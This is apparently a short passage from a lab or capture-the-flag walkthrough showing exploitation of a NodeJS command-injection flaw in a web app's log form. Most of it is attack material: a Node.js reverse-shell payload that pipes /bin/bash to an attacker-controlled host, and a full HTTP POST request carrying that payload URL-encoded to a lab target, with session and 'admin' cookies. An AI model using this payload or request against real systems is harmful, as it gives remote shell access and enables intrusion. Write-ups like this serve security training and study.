Since we already saw that the website was vulnerable to NodeJS command injection. We copied the following line of code.
Changing the script to connect to port 3000 and changing out listening host to our IP. Would result in a reverse shell.
Request Used:
Last updated
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 344
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
username=hjb&msg=var+net+%3D+require%28%22net%22%29%2C+sh+%3D+require%28%22child_process%22%29.exec%28%22%2Fbin%2Fbash%22%29%3B%0D%0Avar+client+%3D+new+net.Socket%28%29%3B%0D%0Aclient.connect%283000%2C+%22192.168.49.135%22%2C+function%28%29%7Bclient.pipe%28sh.stdin%29%3Bsh.stdout.pipe%28client%29%3B%0D%0Ash.stderr.pipe%28client%29%3B%7D%29%3B